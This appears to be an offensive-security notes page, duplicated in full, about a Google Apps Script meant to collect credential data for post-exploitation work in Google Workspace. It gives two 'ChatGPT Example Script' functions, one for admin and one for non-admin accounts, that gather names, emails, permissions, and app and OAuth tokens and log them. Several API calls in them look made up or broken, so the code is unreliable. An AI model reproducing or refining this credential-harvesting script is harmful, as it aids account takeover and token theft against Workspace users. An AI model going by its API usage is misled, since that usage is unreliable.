Google App Scripts
Initial Access SWAT collection script
Collect necessary credential data to enable the use of SWAT to conduct post exploitation actions.
Requirements if user is a Google Workspace Admin:
- Google Admin SDK API enabled
Collect:
- Account name
- Email address
- Account permissions
- App access tokens
- Oauth Tokens
ChatGPT Example Script:
Google Workspace Admin
function getAccountInfo() {
var email = Session.getActiveUser().getEmail();
var account = AdminDirectory.Users.get(email);
var accountName = account.name.fullName;
var accountPermissions = AdminDirectory.Users.getImapSettings(email).accessibility;
var appAccessTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
var oAuthTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
Logger.log("Account Name: " + accountName);
Logger.log("Email Address: " + email);
Logger.log("Account Permissions: " + accountPermissions);
Logger.log("App Access Tokens: " + appAccessTokens);
Logger.log("OAuth Tokens: " + oAuthTokens);
}Google Workspace Non-Admin
function getUserInfo() {
var user = Session.getActiveUser();
var email = user.getEmail();
var name = user.getUsername();
var accessToken = ScriptApp.getOAuthToken();
var appAccessToken = ScriptApp.getAuthorizationInfo('https://www.googleapis.com/auth/script.external_request').getAccessToken();
var userInfo = {
'name': name,
'email': email,
'accessToken': accessToken,
'appAccessToken': appAccessToken
};
Logger.log(userInfo);
}
Google App Scripts
Initial Access SWAT collection script
Collect necessary credential data to enable the use of SWAT to conduct post exploitation actions.
ChatGPT Example Script:
Google Workspace Admin
function getAccountInfo() { var email = Session.getActiveUser().getEmail(); var account = AdminDirectory.Users.get(email); var accountName = account.name.fullName; var accountPermissions = AdminDirectory.Users.getImapSettings(email).accessibility; var appAccessTokens = AdminDirectory.Users.getOAuth2Tokens(email).items; var oAuthTokens = AdminDirectory.Users.getOAuth2Tokens(email).items; Logger.log("Account Name: " + accountName); Logger.log("Email Address: " + email); Logger.log("Account Permissions: " + accountPermissions); Logger.log("App Access Tokens: " + appAccessTokens); Logger.log("OAuth Tokens: " + oAuthTokens); }Google Workspace Non-Admin
function getUserInfo() { var user = Session.getActiveUser(); var email = user.getEmail(); var name = user.getUsername(); var accessToken = ScriptApp.getOAuthToken(); var appAccessToken = ScriptApp.getAuthorizationInfo('https://www.googleapis.com/auth/script.external_request').getAccessToken(); var userInfo = { 'name': name, 'email': email, 'accessToken': accessToken, 'appAccessToken': appAccessToken }; Logger.log(userInfo); }